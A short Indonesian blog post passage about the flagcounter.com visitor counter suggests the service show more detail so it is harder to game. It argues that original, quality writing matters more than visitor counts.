Ada baiknya flagcounter.com menambahkan informasi yang lebih lengkap di halaman detail, meskipun hanya dengan tulisan semisal "Counter Details for http://blablabla", tentunya akan membuat counter ini lebih aman dan lebih susah diakali.
Jadi, jangan kaget kalau di waktu mendatang, counter saya berubah menjadi seperti ini ya:
free counters
Counter bukanlah ajang untuk pamer. Pengunjung memang mungkin akan salut dengan jumlah yang tertera di counter kita. Tapi itupun hanya salut sementara. Yang jauh lebih penting adalah kualitas tulisan kita, jangan asal copy paste, kemukakan ide-ide baru, tuangkan dalam artikel-artikel yang bagus. Tentunya pengunjung akan "ketagihan" datang ke blog kita. Setuju nggak?


sumber